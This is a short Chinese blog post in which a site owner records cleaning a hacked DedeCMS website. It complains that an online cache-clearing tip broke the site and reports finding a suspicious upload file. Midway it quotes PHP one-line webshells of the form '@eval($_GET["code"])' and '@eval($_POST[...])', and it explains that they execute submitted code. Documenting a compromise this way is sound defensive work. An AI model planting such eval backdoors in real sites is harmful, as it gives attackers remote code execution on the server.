关于dedecms的安全防护再次失败了,昨晚上搞得很晚才睡觉,造成我今天上班上午半天都在公司睡觉,主要是收到了这篇CSDN博客的影响,https://blog.csdn.net/cloudday/article/details/9383463,妈呀瞎说,他说清空/data/cache
和/data/tplcache
,结果网站就不能正常打开了,这样dedeCMS的php代码全都用不了,害得我昨晚上花了30大洋,在西部数码做了两次快照还原。
然后现在网上还有很多落后的资料,这个可能和现在用dedeCMS的少了吧,https://blog.csdn.net/seoyundu/article/details/12855759,plus/ad_js.php
和mytag_js.php
文件,不过思路倒是很清晰,可以学学。
然后今天回来继续做这个工作,然后今天重要发现这个代码(<?php @eval($_GET["code"])?>)
<?php @eval($_GET["code"])?>
<?php @eval($_POST[511348])?>
这个典型一句话木马,其中$_GET和$_POST,可通过表单提交PHP代码,然后eval执行,恐怖呀。
然后用dedecms自带的程序扫到了:/uploads/allimg/1902/afsgfhm.php这样的可疑文件以及
下面用DEDEcms木马专杀工具进行的查杀:
以及一些可疑文件的源代码,由于文件内容太多,我直接打包了:
由于时间关系,今天就粗略的记录了这些,明天嗨哟很多事情要忙,不得耽误了。
历史上的今天:
- 2023: 网站换新名字新域名的第一天(0)
本文章百度已收录,若发现本站有任何侵犯您利益的内容,请及时邮件或留言联系,我会第一时间删除所有相关内容。